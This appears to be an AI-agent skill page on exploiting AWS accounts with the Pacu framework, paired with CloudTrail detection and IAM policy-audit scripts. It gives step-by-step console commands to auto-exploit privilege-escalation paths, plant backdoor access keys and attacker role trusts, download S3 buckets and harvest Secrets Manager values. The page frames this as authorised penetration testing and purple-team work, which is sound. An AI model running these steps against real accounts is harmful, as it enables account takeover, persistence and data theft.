Installation

openclaw install mukul975/exploiting-aws-with-pacu

Summary

Pacu is the open-source AWS exploitation framework from Rhino Security Labs. It is the cloud-pentest analogue of Metasploit: a modular Python console that manages target sessions, enumerates an AWS account, identifies privilege-escalation paths, and executes persistence/backdooring/exfiltration modules — all backed by a local SQLite database that records every enumerated resource so modules can chain off one another's findings.

SKILL.md

Exploiting AWS with Pacu

Legal Notice: This skill is for authorized penetration testing and educational purposes only. Pacu performs active enumeration, privilege escalation, persistence, and backdooring against live AWS accounts. Run it ONLY against accounts you own or have explicit written authorization (scope/Rules of Engagement) to test. Many modules create durable changes (new IAM users, access keys, policies); track and remove everything. Unauthorized use is illegal under the CFAA and equivalent laws.

Overview

Pacu is the open-source AWS exploitation framework from Rhino Security Labs. It is the cloud-pentest analogue of Metasploit: a modular Python console that manages target sessions, enumerates an AWS account, identifies privilege-escalation paths, and executes persistence/backdooring/exfiltration modules — all backed by a local SQLite database that records every enumerated resource so modules can chain off one another's findings.

A Pacu engagement follows a consistent arc. You create a named session, load AWS keys (with set_keys or by importing from ~/.aws/credentials), confirm the identity with whoami, then enumerate IAM and the rest of the account. The flagship workflow is iam__enum_permissions followed by iam__privesc_scan, which checks the compromised principal against ~20 known AWS IAM privilege-escalation primitives (e.g. iam:CreatePolicyVersion, iam:AttachUserPolicy, iam:PassRole + lambda:CreateFunction, sts:AssumeRole) and can auto-exploit them. Persistence modules such as iam__backdoor_users_keys mint a second access key on an existing user, and iam__backdoor_assume_role adds a trust to a role so the attacker can assume it later.

This skill covers installing Pacu, session and credential management, IAM enumeration, automated privilege-escalation scanning and exploitation, persistence/backdooring, and data access — every command and module name verified against the Rhino Security Labs project. Source: github.com/RhinoSecurityLabs/pacu.

When to Use

  • Conducting an authorized AWS cloud penetration test or red-team engagement
  • Assessing the blast radius of a single compromised IAM credential (privesc scanning)
  • Demonstrating persistence/backdoor techniques to drive remediation
  • Generating realistic attacker telemetry to test cloud detections (purple team)
  • Mapping an unfamiliar AWS account's IAM, EC2, S3, and Lambda exposure

Prerequisites

  • Pacu installed:
  python3 -m pip install -U pip
  python3 -m pip install -U pacu     # then run: pacu
  # or, preferred on Kali, with pipx:
  pipx install git+https://github.com/RhinoSecurityLabs/pacu.git
  # or Docker:
  docker run -it rhinosecuritylabs/pacu:latest
  • AWS access key/secret (and optional session token) for the in-scope target principal
  • A signed authorization / Rules of Engagement document defining scope
  • Python 3.9+ and outbound HTTPS to AWS API endpoints
  • AWS CLI installed for verification (aws sts get-caller-identity)

Objectives

  • Install Pacu and create an isolated engagement session
  • Load and validate target AWS credentials
  • Enumerate IAM permissions for the compromised principal
  • Identify and (where authorized) exploit privilege-escalation paths
  • Establish persistence via backdoor access keys and role trusts
  • Enumerate and access data in EC2, S3, and Secrets Manager
  • Export findings for reporting and ensure all artifacts are removed

MITRE ATT&CK Mapping

| ID | Name | Use in this skill |
|----|------|-------------------|
| T1078.004 | Valid Accounts: Cloud Accounts | Pacu operates as a valid AWS principal and abuses its permissions |
| T1098.001 | Account Manipulation: Additional Cloud Credentials | iam__backdoor_users_keys mints a second access key |
| T1098.003 | Account Manipulation: Additional Cloud Roles | iam__backdoor_assume_role / privesc via role policy changes |
| T1580 | Cloud Infrastructure Discovery | ec2__enum, iam__enum_users_roles_policies_groups |
| T1530 | Data from Cloud Storage | s3__download_bucket retrieves S3 objects |
| T1552.005 | Unsecured Credentials: Cloud Instance Metadata API | EC2 IMDS credential abuse |

Workflow

1. Launch Pacu and create a session

pacu
# In the Pacu console:
Pacu> set_keys
#   key alias  : engagement-target
#   access key : AKIA...
#   secret key : ...
#   session tok: (optional)

2. Confirm the identity you are operating as

Pacu> whoami
Pacu> aws sts get-caller-identity         # Pacu passes "aws ..." through to the AWS CLI; or run it outside Pacu

3. Enumerate IAM entities and the compromised principal's permissions

Pacu> run iam__enum_users_roles_policies_groups
Pacu> run iam__enum_permissions
Pacu> data IAM            # review what was collected into the session DB

4. Scan for privilege-escalation paths

iam__privesc_scan checks the principal against known AWS privesc primitives and lists viable methods.

Pacu> run iam__privesc_scan --offline      # analyze without making changes
# Without --offline the module also attempts automated exploitation of a discovered method:
Pacu> run iam__privesc_scan

5. Establish persistence with a backdoor access key

Pacu> run iam__backdoor_users_keys --usernames target-user
# Add an assumable-role trust for long-term access:
Pacu> run iam__backdoor_assume_role --role-names target-role --user-arns arn:aws:iam::111122223333:user/attacker

6. Enumerate compute and storage

Pacu> run ec2__enum
Pacu> run s3__download_bucket --names target-bucket
Pacu> data S3

7. Harvest secrets

Pacu> run enum__secrets                   # Secrets Manager and SSM Parameter Store

8. Non-interactive execution (CI / scripted)

Pacu supports one-shot module execution from the shell.

pacu --session engagement --module-name iam__enum_users_roles_policies_groups --exec
pacu --session engagement --module-name s3__download_bucket \
     --module-args "--names target-bucket" --exec

9. Export findings and clean up

Pacu> data                           # review all data collected into the session DB
# Manually remove every backdoor created (record ARNs/key IDs first):
aws iam delete-access-key --user-name target-user --access-key-id AKIA_BACKDOOR
aws iam update-assume-role-policy --role-name target-role --policy-document file://original-trust.json

See scripts/agent.py to drive the enumerate->privesc flow non-interactively.

Tools and Resources

| Resource | Purpose | Link |
|----------|---------|------|
| Pacu GitHub | Source, modules, wiki | https://github.com/RhinoSecurityLabs/pacu |
| Pacu module list | Per-module documentation | https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details |
| Rhino AWS privesc research | The privesc primitives iam__privesc_scan checks | https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ |
| AWS IAM docs | Permission and policy reference | https://docs.aws.amazon.com/IAM/latest/UserGuide/ |
| CloudGoat | Vulnerable AWS lab to practice safely | https://github.com/RhinoSecurityLabs/cloudgoat |

OPSEC and Detection Considerations

Pacu modules are noisy and durable; an operator must plan for both detection and cleanup:

  • iam__enum_permissions and iam__enum_users_roles_policies_groups generate a large burst of iam:List/iam:Get calls visible in CloudTrail and GuardDuty (Discovery:IAMUser/AnomalousBehavior).
  • iam__privesc_scan in non-offline mode can make state-changing calls (iam:CreatePolicyVersion, iam:AttachUserPolicy); use --offline for analysis only.
  • iam__backdoor_users_keys triggers iam:CreateAccessKey, and iam__backdoor_assume_role triggers iam:UpdateAssumeRolePolicy; both are high-signal persistence indicators that defenders alert on.
  • Record every artifact ID (access keys, policy versions, role-trust changes) so each can be reverted; orphaned backdoors are both an OPSEC failure and a real risk to the client.
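The two signals this section describes, as detection logic run over constructed CloudTrail records. This is an added example, not Pacu code; the burst threshold and window are assumed tuning values, and the account ID, user and role names are constructed.

```python
"""Flag the CloudTrail signals described above: high-signal IAM persistence/privesc
calls and a burst of iam:List*/iam:Get* discovery calls by one principal."""
from collections import defaultdict
from datetime import datetime

# API calls the page names as high-signal persistence / privesc indicators.
HIGH_SIGNAL_EVENTS = {"CreateAccessKey", "UpdateAssumeRolePolicy", "CreatePolicyVersion",
                      "SetDefaultPolicyVersion", "AttachUserPolicy"}
BURST_THRESHOLD = 20        # assumed tuning value: List/Get calls by one principal ...
BURST_WINDOW_SECONDS = 300  # ... inside this sliding window (also assumed)


def detect(records):
    """Return (principal_arn, finding, detail) tuples for a list of CloudTrail records."""
    findings, discovery = [], defaultdict(list)
    for rec in records:
        if rec.get("eventSource") != "iam.amazonaws.com":
            continue  # only IAM events feed these two detections
        arn = rec.get("userIdentity", {}).get("arn", "unknown")
        name, params = rec["eventName"], rec.get("requestParameters") or {}
        if name in HIGH_SIGNAL_EVENTS:
            target = params.get("userName") or params.get("roleName") or params.get("policyArn", "")
            findings.append((arn, f"iam:{name}", target))
        elif name.startswith(("List", "Get")):
            discovery[arn].append(datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ"))
    for arn, times in discovery.items():
        times.sort()
        lo = 0  # sliding window: any span <= BURST_WINDOW_SECONDS holding >= threshold calls
        for hi, t in enumerate(times):
            while (t - times[lo]).total_seconds() > BURST_WINDOW_SECONDS:
                lo += 1
            if hi - lo + 1 >= BURST_THRESHOLD:
                findings.append((arn, "iam-discovery-burst",
                                 f"{hi - lo + 1} List/Get calls in {BURST_WINDOW_SECONDS}s"))
                break
    return findings


def _rec(name, when, params=None, source="iam.amazonaws.com",
         arn="arn:aws:iam::111122223333:user/target-user"):
    return {"eventSource": source, "eventName": name, "eventTime": when,
            "userIdentity": {"arn": arn}, "requestParameters": params or {}}


# Constructed sample trail: an enumeration burst, two persistence calls, one STS call.
SAMPLE_RECORDS = (
    [_rec("ListUsers", f"2024-05-01T10:00:{i:02d}Z") for i in range(22)]
    + [_rec("CreateAccessKey", "2024-05-01T10:05:00Z", {"userName": "target-user"}),
       _rec("UpdateAssumeRolePolicy", "2024-05-01T10:06:00Z", {"roleName": "target-role"}),
       _rec("GetCallerIdentity", "2024-05-01T10:06:30Z", source="sts.amazonaws.com")]
)
```

Feed real records from a CloudTrail export (the `Records` array of each log file) to `detect` and route the returned tuples to your alerting pipeline.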

Defensive Mitigations to Recommend

| Finding | Remediation |
|---------|-------------|
| Over-permissive IAM principal (privesc path) | Apply least privilege; scope iam:PassRole with conditions |
| iam:CreatePolicyVersion / SetDefaultPolicyVersion allowed | Remove from non-admin roles |
| Long-lived access keys | Enforce key rotation; prefer roles / short-lived STS creds |
| No detection on key creation | Alert on CreateAccessKey / UpdateAssumeRolePolicy in CloudTrail |
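The first two remediations above, as a policy-review check a defender can run on a policy document before it is attached. This is an added example, not Pacu or AWS code; it covers only the single-action and PassRole+Lambda primitives this page names, does not evaluate Resource scoping, and uses a constructed sample policy.

```python
"""Audit an IAM policy document for the privilege-escalation primitives this page
names, from the policy reviewer's side (added example, not Pacu code)."""
import fnmatch

# Single-action primitives named on this page, with the remediation the table gives.
PRIVESC_ACTIONS = {
    "iam:CreatePolicyVersion": "remove from non-admin principals",
    "iam:SetDefaultPolicyVersion": "remove from non-admin principals",
    "iam:AttachUserPolicy": "remove from non-admin principals",
    "sts:AssumeRole": "review which role trust policies admit this principal",
}
PASSROLE_CHAINS = ["lambda:CreateFunction"]  # runs code under a passed role

def _actions(policy, effect, conditional_ok=True):
    """Yield (action_pattern, has_condition) from each statement with the given Effect."""
    stmts = policy.get("Statement", [])
    for s in [stmts] if isinstance(stmts, dict) else stmts:
        if s.get("Effect") != effect or (s.get("Condition") and not conditional_ok):
            continue
        acts = s.get("Action", [])
        for a in [acts] if isinstance(acts, str) else acts:
            yield a, bool(s.get("Condition"))

def _matches(action, patterns):
    # IAM action matching is case-insensitive and accepts '*' / '?' wildcards.
    return any(fnmatch.fnmatch(action.lower(), p.lower()) for p in patterns)

def audit_policy(policy):
    """Return findings for one policy document (Resource scoping is NOT evaluated)."""
    allows = list(_actions(policy, "Allow"))
    denies = [p for p, _ in _actions(policy, "Deny", conditional_ok=False)]  # unconditional denies win
    granted = lambda act: _matches(act, [p for p, _ in allows]) and not _matches(act, denies)
    findings = [f"{a} allowed: {why}" for a, why in sorted(PRIVESC_ACTIONS.items()) if granted(a)]
    if granted("iam:PassRole"):
        if any(not cond for p, cond in allows if fnmatch.fnmatch("iam:passrole", p.lower())):
            findings.append("iam:PassRole allowed without a Condition: scope it (e.g. iam:PassedToService)")
        findings += [f"iam:PassRole + {svc}: privesc chain" for svc in PASSROLE_CHAINS if granted(svc)]
    return findings

SAMPLE_POLICY = {  # constructed sample: an over-permissive developer policy
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
        {"Effect": "Allow", "Action": "lambda:*", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:CreatePolicyVersion", "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:AttachUserPolicy", "Resource": "*"},
    ],
}
```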

Key Module Reference

| Module | Purpose |
|--------|---------|
| iam__enum_users_roles_policies_groups | Enumerate all IAM principals and policies |
| iam__enum_permissions | Resolve the current principal's effective permissions |
| iam__privesc_scan | Identify (and optionally exploit) privesc paths |
| iam__backdoor_users_keys | Create a backdoor access key on a user |
| iam__backdoor_assume_role | Add an attacker-controlled trust to a role |
| ec2__enum | Enumerate EC2 instances, volumes, snapshots |
| s3__download_bucket | Download objects from an S3 bucket |
| enum__secrets | Enumerate Secrets Manager / SSM parameters |

Validation Criteria

  • [ ] Pacu installed and console launches
  • [ ] Engagement session created and keys loaded
  • [ ] Identity confirmed with whoami / sts get-caller-identity
  • [ ] IAM entities and current-principal permissions enumerated
  • [ ] iam__privesc_scan run and viable paths documented
  • [ ] Persistence module behavior demonstrated (in authorized scope)
  • [ ] EC2/S3/secrets enumeration completed
  • [ ] All created backdoors (keys, role trusts, policies) recorded and removed
  • [ ] Findings exported for the engagement report
  • [ ] No residual attacker artifacts remain in the account
